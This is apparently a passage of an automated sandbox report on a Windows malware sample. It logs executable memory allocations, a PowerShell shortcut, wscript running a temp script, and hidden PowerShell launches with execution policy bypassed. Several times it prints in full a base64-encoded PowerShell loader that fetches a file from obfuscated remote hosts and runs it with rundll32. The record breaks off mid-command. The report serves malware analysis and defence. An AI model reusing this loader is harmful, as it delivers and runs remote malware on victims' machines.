NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029e1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029e3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029e4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029e6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029e8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029e9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029ed000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029ee000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029ef000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a31000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a32000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:26 a.m.	process_identifier: 2416 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a33000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABtAG8AbwByAGUAcwBzAFQAYQByAHQAYQByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABJAEEATgB3AEEAdQBBAEQARQBBAE4AQQBBADEAQQBDADQAQQBNAFEAQQAxAEEARABJAEEATABnAEEAeABBAEQAZwBBAE8AUQBBAD0ASQBoAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAZwBBAGIAdwBCAHQAQQBHADgAQQBaAHcAQgBsAEEARwA0AEEAWgBRAEIAaABBAEcAdwBBAEwAZwBCAHEAQQBIAEEAQQBJAGgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABBAEEATgBnAEEAdQBBAEQASQBBAE4AQQBBADIAQQBDADQAQQBNAGcAQQB3AEEARABBAEEATABnAEEAeABBAEQARQBBAE4AUQBBAD0AIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMwA7ACQAdQBwAHIAYQBpAHMAZQBkAEYAaQBsAGUAcwBhAHYAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAG8AQQBIAGsAQQBjAEEAQgB1AEEARwA4AEEAZABBAEIAcABBAEgAbwBBAFoAUQBBAHUAQQBHAFkAQQBkAFEAQgAwAEEARwBJAEEAYgB3AEIAcwBBAEEAPQA9AFIASABDAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUgBBAEgAVQBBAGEAUQBCAHUAQQBHAEUAQQBjAGcAQgBwAEEARwBFAEEAYgBnAEIASgBBAEcANABBAFoAZwBCAGgAQQBHADQAQQBaAHcAQgBzAEEARwBVAEEAYgBRAEIAbABBAEcANABBAGQAQQBBAHUAQQBHADAAQQBiAGcAQQA9ACIAOwAkAFMAZQBtAGkAaABhAHIAZABDAGEAcABzAHUAbABvAHAAdQBwAGkAbABsAGEAcgB5ACAAPQAgADUANgA7ACQAQQBkAGUAbABvAGMAbwBkAG8AbgBpAGMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAEUAQQBMAGcAQQB4AEEARABrAEEATQB3AEEAdQBBAEQAUQBBAE0AdwBBAHUAQQBEAGsAQQBPAEEAQQB2AEEARQBFAEEAUgB3AEIAMgBBAEYAbwBBAGEAQQBBADQAQQBFAE0AQQBMAHcAQgBYAEEASABjAEEAZQBnAEIAegBBAEgATQBBAFUAQQBCAHEAQQBHAFkAQQBkAGcAQgA2AEEARQBZAEEAUABaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAYwBBAEwAZwBBADUAQQBEAEUAQQBMAGcAQQA0AEEARABjAEEATABnAEEAeABBAEQAVQBBAE8AQQBBAHYAQQBIAFUAQQBWAGcAQgAzAEEARwAwAEEATQBBAEIAQgBBAEMAOABBAE8AQQBCADYAQQBIAEkAQQBXAEEAQQA0AEEAQQA9AD0AUABaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQARQBBAEwAZwBBAHgAQQBEAGsAQQBNAHcAQQB1AEEARABRAEEATQB3AEEAdQBBAEQARQBBAE0AQQBBAHgAQQBDADgAQQBhAEEAQQAzAEEARABFAEEATAB3AEIASQBBAEYAUQBBAGMAQQBBADMAQQBFAHMAQQBlAFEAQgBhAEEARABRAEEAUABaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAawBBAEwAZwBBAHgAQQBEAE0AQQBOAHcAQQB1AEEARABJAEEATgBBAEEANABBAEMANABBAE0AUQBBADIAQQBEAE0AQQBMAHcAQgBZAEEARwA0AEEAVQBRAEIAawBBAEQASQBBAFkAZwBCAE0AQQBDADgAQQBaAHcAQgBrAEEARwBjAEEAVgBBAEIAbgBBAEcATQBBAFMAdwBCAG4AQQBHADAAQQBOAFEAQQA9AFAAWgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGMAQQBMAGcAQQA1AEEARABFAEEATABnAEEANABBAEQAYwBBAEwAZwBBAHgAQQBEAGsAQQBPAEEAQQB2AEEASABFAEEAWgBnAEIAaQBBAEcAWQBBAGQAUQBBAHYAQQBGAFkAQQBiAGcAQgB6AEEARABNAEEAUwBBAEIAbQBBAEcAYwBBAGMAQQBCAG8AQQBHAEkAQQBjAEEAQQB3AEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAUAByAGUAZgBpAGcAdQByAGUAcwBVAG4AdwByAGEAcABwAGUAcgAgAGkAbgAgACQAQQBkAGUAbABvAGMAbwBkAG8AbgBpAGMAIAAtAHMAcABsAGkAdAAgACIAUABaACIAKQAgAHsAJABHAHUAcwBoAGkAbgBnACAAPQAgADUANAA2ADsAJABVAG4AZQB4AHQAcgBhAGMAdABlAGQARABlAGwAaQBnAGgAdAAgAD0AIAAiAEUAdABoAHkAbABhAHQAaQBvAG4AIgA7AHQAcgB5ACAAewAkAGkAbgBmAGUAcgB0AGkAbABlAEEAZQBzAGMAdQBsAGEAYwBlAG8AdQBzACAAPQAgACIAZwBsAG8AcwBzAGEAcgBpAHoAZQAiADsAJABOAG8AbgBlAHgAcABvAHMAdQByAGUAVAByAGEAbgBzAG0AaQB0AHQAYQBiAGkAbABpAHQAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABQAHIAZQBmAGkAZwB1AHIAZQBzAFUAbgB3AHIAYQBwAHAAZQByACkAKQA7AHcAZwBlAHQAIAAkAE4AbwBuAGUAeABwAG8AcwB1AHIAZQBUAHIAYQBuAHMAbQBpAHQAdABhAGIAaQBsAGkAdAB5ACAALQBPACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAYgBpAHQAdABlAHIAcwB3AGUAZQB0AHMATQBpAGwAawBsAGkAawBlAC4AbABvAHYAYQBiAGwAeQBVAG4AcwBhAHcAZQBkADsAJABjAG8AbQBtAGUAbQBvAHIAYQB0AGkAdgBlAG4AZQBzAHMATQBvAG4AbwBzAHkAbgBhAHAAdABpAGMAYQBsAGwAeQAgAD0AIAAyADMAOAA7ACQAcgBlAHMAaQBsAGkAdQBtACAAPQAgADkAMgA3ADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGIAaQB0AHQAZQByAHMAdwBlAGUAdABzAE0AaQBsAGsAbABpAGsAZQAuAGwAbwB2AGEAYgBsAHkAVQBuAHMAYQB3AGUAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEANQA0ADMANgA2ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBZAGcAQgBwAEEASABRAEEAZABBAEIAbABBAEgASQBBAGMAdwBCADMAQQBHAFUAQQBaAFEAQgAwAEEASABNAEEAVABRAEIAcABBAEcAdwBBAGEAdwBCAHMAQQBHAGsAQQBhAHcAQgBsAEEAQwA0AEEAYgBBAEIAdgBBAEgAWQBBAFkAUQBCAGkAQQBHAHcAQQBlAFEAQgBWAEEARwA0AEEAYwB3AEIAaABBAEgAYwBBAFoAUQBCAGsAQQBDAHcAQQBjAEEAQgB5AEEARwBrAEEAYgBnAEIAMABBAEQAcwBBACIAOwAkAEcAaQBuAGcAZQByAG4AZQBzAHMAUgBlAHQAcgBvAGMAZQBjAGEAbAAgAD0AIAAiAEQAZQByAGUAbABpAG4AcQB1AGkAcwBoAEcAYQBtAGUAbABvAHQAdABlACIAOwAkAFMAcABvAG8AZgBzACAAPQAgACIAbgB1AG0AaQBuAGkAcwBtACIAOwBiAHIAZQBhAGsAOwB9AFIAZQBhAGMAdABEAE8ATQA7AH0AIABjAGEAdABjAGgAIAB7ACQAUwBhAGwAdAB1AHMAZQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBMAEEARwBVAEEAYgBRAEIAdwBBAEcAdwBBAFoAUQBCAEQAQQBIAEkAQQBiAHcAQgB6AEEASABNAEEAWQBnAEIAdgBBAEcANABBAFoAUQBCAHoAQQBDADQAQQBZAHcAQgBoAEEASABNAEEAYQBRAEIAdQBBAEcAOABBACIAOwAkAGEAbgB0AGkAYwBsAGkAbQBhAGMAdABpAGMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAGcAQQAwAEEAQwA0AEEATgBBAEEAeQBBAEMANABBAE4AUQBBAHcAQQBDADQAQQBNAGcAQQAwAEEARABBAEEAIgA7ACQAUABhAGwAbQBpAHAAZQBkAFQAbwBjAG8AbABvAGcAaQBjAGEAbAAgAD0AIAA2ADIAOwB9AH0AJABiAGUAcwBjAG8AdQByAGcAZQAgAD0AIAA5ADUAOQA7ACQAbQBhAGMAZQBkAG8AaQBuAGUAUgBhAHQAdABsAGkAbgBnACAAPQAgACIAcABlAGwAbwBwAGkAZABTAHEAdQBhAHQAdABvAGMAcgBhAGMAeQAiADsA"

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABtAG8AbwByAGUAcwBzAFQAYQByAHQAYQByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABJAEEATgB3AEEAdQBBAEQARQBBAE4AQQBBADEAQQBDADQAQQBNAFEAQQAxAEEARABJAEEATABnAEEAeABBAEQAZwBBAE8AUQBBAD0ASQBoAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAZwBBAGIAdwBCAHQAQQBHADgAQQBaAHcAQgBsAEEARwA0AEEAWgBRAEIAaABBAEcAdwBBAEwAZwBCAHEAQQBIAEEAQQBJAGgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABBAEEATgBnAEEAdQBBAEQASQBBAE4AQQBBADIAQQBDADQAQQBNAGcAQQB3AEEARABBAEEATABnAEEAeABBAEQARQBBAE4AUQBBAD0AIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMwA7ACQAdQBwAHIAYQBpAHMAZQBkAEYAaQBsAGUAcwBhAHYAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAG8AQQBIAGsAQQBjAEEAQgB1AEEARwA4AEEAZABBAEIAcABBAEgAbwBBAFoAUQBBAHUAQQBHAFkAQQBkAFEAQgAwAEEARwBJAEEAYgB3AEIAcwBBAEEAPQA9AFIASABDAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUgBBAEgAVQBBAGEAUQBCAHUAQQBHAEUAQQBjAGcAQgBwAEEARwBFAEEAYgBnAEIASgBBAEcANABBAFoAZwBCAGgAQQBHADQAQQBaAHcAQgBzAEEARwBVAEEAYgBRAEIAbABBAEcANABBAGQAQQBBAHUAQQBHADAAQQBiAGcAQQA9ACIAOwAkAFMAZQBtAGkAaABhAHIAZABDAGEAcABzAHUAbABvAHAAdQBwAGkAbABsAGEAcgB5ACAAPQAgADUANgA7ACQAQQBkAGUAbABvAGMAbwBkAG8AbgBpAGMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAEUAQQBMAGcAQQB4AEEARABrAEEATQB3AEEAdQBBAEQAUQBBAE0AdwBBAHUAQQBEAGsAQQBPAEEAQQB2AEEARQBFAEEAUgB3AEIAMgBBAEYAbwBBAGEAQQBBADQAQQBFAE0AQQBMAHcAQgBYAEEASABjAEEAZQBnAEIAegBBAEgATQBBAFUAQQBCAHEAQQBHAFkAQQBkAGcAQgA2AEEARQBZAEEAUABaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAYwBBAEwAZwBBADUAQQBEAEUAQQBMAGcAQQA0AEEARABjAEEATABnAEEAeABBAEQAVQBBAE8AQQBBAHYAQQBIAFUAQQBWAGcAQgAzAEEARwAwAEEATQBBAEIAQgBBAEMAOABBAE8AQQBCADYAQQBIAEkAQQBXAEEAQQA0AEEAQQA9AD0AUABaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQARQBBAEwAZwBBAHgAQQBEAGsAQQBNAHcAQQB1AEEARABRAEEATQB3AEEAdQBBAEQARQBBAE0AQQBBAHgAQQBDADgAQQBhAEEAQQAzAEEARABFAEEATAB3AEIASQBBAEYAUQBBAGMAQQBBADMAQQBFAHMAQQBlAFEAQgBhAEEARABRAEEAUABaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAawBBAEwAZwBBAHgAQQBEAE0AQQBOAHcAQQB1AEEARABJAEEATgBBAEEANABBAEMANABBAE0AUQBBADIAQQBEAE0AQQBMAHcAQgBZAEEARwA0AEEAVQBRAEIAawBBAEQASQBBAFkAZwBCAE0AQQBDADgAQQBaAHcAQgBrAEEARwBjAEEAVgBBAEIAbgBBAEcATQBBAFMAdwBCAG4AQQBHADAAQQBOAFEAQQA9AFAAWgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGMAQQBMAGcAQQA1AEEARABFAEEATABnAEEANABBAEQAYwBBAEwAZwBBAHgAQQBEAGsAQQBPAEEAQQB2AEEASABFAEEAWgBnAEIAaQBBAEcAWQBBAGQAUQBBAHYAQQBGAFkAQQBiAGcAQgB6AEEARABNAEEAUwBBAEIAbQBBAEcAYwBBAGMAQQBCAG8AQQBHAEkAQQBjAEEAQQB3AEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAUAByAGUAZgBpAGcAdQByAGUAcwBVAG4AdwByAGEAcABwAGUAcgAgAGkAbgAgACQAQQBkAGUAbABvAGMAbwBkAG8AbgBpAGMAIAAtAHMAcABsAGkAdAAgACIAUABaACIAKQAgAHsAJABHAHUAcwBoAGkAbgBnACAAPQAgADUANAA2ADsAJABVAG4AZQB4AHQAcgBhAGMAdABlAGQARABlAGwAaQBnAGgAdAAgAD0AIAAiAEUAdABoAHkAbABhAHQAaQBvAG4AIgA7AHQAcgB5ACAAewAkAGkAbgBmAGUAcgB0AGkAbABlAEEAZQBzAGMAdQBsAGEAYwBlAG8AdQBzACAAPQAgACIAZwBsAG8AcwBzAGEAcgBpAHoAZQAiADsAJABOAG8AbgBlAHgAcABvAHMAdQByAGUAVAByAGEAbgBzAG0AaQB0AHQAYQBiAGkAbABpAHQAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABQAHIAZQBmAGkAZwB1AHIAZQBzAFUAbgB3AHIAYQBwAHAAZQByACkAKQA7AHcAZwBlAHQAIAAkAE4AbwBuAGUAeABwAG8AcwB1AHIAZQBUAHIAYQBuAHMAbQBpAHQAdABhAGIAaQBsAGkAdAB5ACAALQBPACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAYgBpAHQAdABlAHIAcwB3AGUAZQB0AHMATQBpAGwAawBsAGkAawBlAC4AbABvAHYAYQBiAGwAeQBVAG4AcwBhAHcAZQBkADsAJABjAG8AbQBtAGUAbQBvAHIAYQB0AGkAdgBlAG4AZQBzAHMATQBvAG4AbwBzAHkAbgBhAHAAdABpAGMAYQBsAGwAeQAgAD0AIAAyADMAOAA7ACQAcgBlAHMAaQBsAGkAdQBtACAAPQAgADkAMgA3ADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGIAaQB0AHQAZQByAHMAdwBlAGUAdABzAE0AaQBsAGsAbABpAGsAZQAuAGwAbwB2AGEAYgBsAHkAVQBuAHMAYQB3AGUAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEANQA0ADMANgA2ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBZAGcAQgBwAEEASABRAEEAZABBAEIAbABBAEgASQBBAGMAdwBCADMAQQBHAFUAQQBaAFEAQgAwAEEASABNAEEAVABRAEIAcABBAEcAdwBBAGEAdwBCAHMAQQBHAGsAQQBhAHcAQgBsAEEAQwA0AEEAYgBBAEIAdgBBAEgAWQBBAFkAUQBCAGkAQQBHAHcAQQBlAFEAQgBWAEEARwA0AEEAYwB3AEIAaABBAEgAYwBBAFoAUQBCAGsAQQBDAHcAQQBjAEEAQgB5AEEARwBrAEEAYgBnAEIAMABBAEQAcwBBACIAOwAkAEcAaQBuAGcAZQByAG4AZQBzAHMAUgBlAHQAcgBvAGMAZQBjAGEAbAAgAD0AIAAiAEQAZQByAGUAbABpAG4AcQB1AGkAcwBoAEcAYQBtAGUAbABvAHQAdABlACIAOwAkAFMAcABvAG8AZgBzACAAPQAgACIAbgB1AG0AaQBuAGkAcwBtACIAOwBiAHIAZQBhAGsAOwB9AFIAZQBhAGMAdABEAE8ATQA7AH0AIABjAGEAdABjAGgAIAB7ACQAUwBhAGwAdAB1AHMAZQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBMAEEARwBVAEEAYgBRAEIAdwBBAEcAdwBBAFoAUQBCAEQAQQBIAEkAQQBiAHcAQgB6AEEASABNAEEAWQBnAEIAdgBBAEcANABBAFoAUQBCAHoAQQBDADQAQQBZAHcAQgBoAEEASABNAEEAYQBRAEIAdQBBAEcAOABBACIAOwAkAGEAbgB0AGkAYwBsAGkAbQBhAGMAdABpAGMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAGcAQQAwAEEAQwA0AEEATgBBAEEAeQBBAEMANABBAE4AUQBBAHcAQQBDADQAQQBNAGcAQQAwAEEARABBAEEAIgA7ACQAUABhAGwAbQBpAHAAZQBkAFQAbwBjAG8AbABvAGcAaQBjAGEAbAAgAD0AIAA2ADIAOwB9AH0AJABiAGUAcwBjAG8AdQByAGcAZQAgAD0AIAA5ADUAOQA7ACQAbQBhAGMAZQBkAG8AaQBuAGUAUgBhAHQAdABsAGkAbgBnACAAPQAgACIAcABlAGwAbwBwAGkAZABTAHEAdQBhAHQAdABvAGMAcgBhAGMAeQAiADsA"

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return
ShellExecuteExW May 12, 2023, 9:26 a.m.	show_type: 0 filepath_r: wscript parameters: "C:\Users\test22\AppData\Local\Temp\Cnsx.js" HydrocinnamicCanalised Batboy broachingAppetibleness filepath: wscript	1	1
CreateProcessInternalW May 12, 2023, 9:26 a.m.	thread_identifier: 2404 thread_handle: 0x00000340 process_identifier: 2416 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABtAG8AbwByAGUAcwBzAFQAYQByAHQAYQByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABJAEEATgB3AEEAdQBBAEQARQBBAE4AQQBBADEAQQBDADQAQQBNAFEAQQAxAEEARABJAEEATABnAEEAeABBAEQAZwBBAE8AUQBBAD0ASQBoAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAZwBBAGIAdwBCAHQAQQBHADgAQQBaAHcAQgBsAEEARwA0AEEAWgBRAEIAaABBAEcAdwBBAEwAZwBCAHEAQQBIAEEAQQBJAGgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABBAEEATgBnAEEAdQBBAEQASQBBAE4AQQBBADIAQQBDADQAQQBNAGcAQQB3AEEARABBAEEATABnAEEAeABBAEQARQBBAE4AUQBBAD0AIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMwA7ACQAdQBwAHIAYQBpAHMAZQBkAEYAaQBsAGUAcwBhAHYAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAG8AQQBIAGsAQQBjAEEAQgB1AEEARwA4AEEAZABBAEIAcABBAEgAbwBBAFoAUQBBAHUAQQBHAFkAQQBkAFEAQgAwAEEARwBJAEEAYgB3AEIAcwBBAEEAPQA9AFIASABDAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUgBBAEgAVQBBAGEAUQBCAHUAQQBHAEUAQQBjAGcAQgBwAEEARwBFAEEAYgBnAEIASgBBAEcANABBAFoAZwBCAGgAQQBHADQAQQBaAHcAQgBzAEEARwBVAEEAYgBRAEIAbABBAEcANABBAGQAQQBBAHUAQQBHADAAQQBiAGcAQQA9ACIAOwAkAFMAZQBtAGkAaABhAHIAZABDAGEAcA